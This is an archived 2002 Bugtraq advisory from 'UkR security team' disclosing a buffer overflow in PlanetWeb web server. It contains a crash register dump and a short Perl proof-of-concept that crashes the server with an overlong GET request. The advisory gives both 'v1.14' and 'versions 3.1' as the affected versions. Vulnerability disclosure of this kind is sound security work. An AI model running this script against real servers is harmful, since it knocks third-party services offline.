Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Planet Web Software Buffer Overflow

From: "UkR security team™" <cuctema () ok ru>
Date: Sun, 15 Sep 2002 01:38:35 +0400
:UkR security team presents:

Release Date:  September 14, 2002
Product : PlanetWeb Software v1.14 and earlier versions 
Vendor      :  PlanetDNS (http://www.planetdns.net)
Type        :  Buffer Overflow
Author      :  UkR-XblP (cuctema () ok ru)
Platforms : Microsoft Windows Variants 
About PlanetWeb:
PlanetWeb is a complete commercial software package that provides you with everything you need to run your own website directly from your computer. It includes our lightening fast web server with integrated PHP support, so you can create sophisticated web pages without doing any configuration! 
Overview:
A buffer overflow exists in versions 3.1 and previous of PlanetWeb Software. Exploitation of this vulnerability allows remote execution of arbitrary code with daemon privileges. 

Detailed Description:
Sending a GET request containing a URL of approximately 1024 characters or more causes Planet Web Server to crash. Exploitation is possible and proof of concept 
code has been authored to demonstrate this problem.

Result:
PDNSC caused an invalid page fault in
module KERNEL32.DLL at 0167:bff9db61.
Registers:
EAX=c00309c4 CS=0167 EIP=bff9db61 EFLGS=00010216
EBX=ffffffff SS=016f ESP=0214fde8 EBP=02150084
ECX=00000000 DS=016f ESI=81770a14 FS=4217
EDX=bff76855 ES=016f EDI=02150120 GS=0000
Bytes at CS:EIP:
53 8b 15 e4 9c fc bf 56 89 4d e4 57 89 4d dc 89 Stack dump: 

Solution:
Disable the Planet Web Server until a patch is made available by the vendor. 

----------------- exploit - cut here -----------------

#!/usr/bin/perl
# PlanetWeb Software perl exploit
# by UkR-XblP / UkR security team
use IO::Socket;
unless (@ARGV == 1) { die "usage: $0 vulnurable_server ..." } 
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto     => "tcp",
                                 PeerAddr  => $host,
                                 PeerPort  => "http(80)",
                                 );
unless ($remote) { die "cannot connect to http daemon on $host" } 
$xblp = "A" x 1024;
$exploit = "GET /".$xblp." HTTP/1.0\n\n";
$remote->autoflush(1);
print $remote $exploit;
close $remote;

----------------- exploit - cut here -----------------
---
Professional hosting for everyone - http://www.host.ru
Previous By Date Next
Previous By Thread Next

Current thread: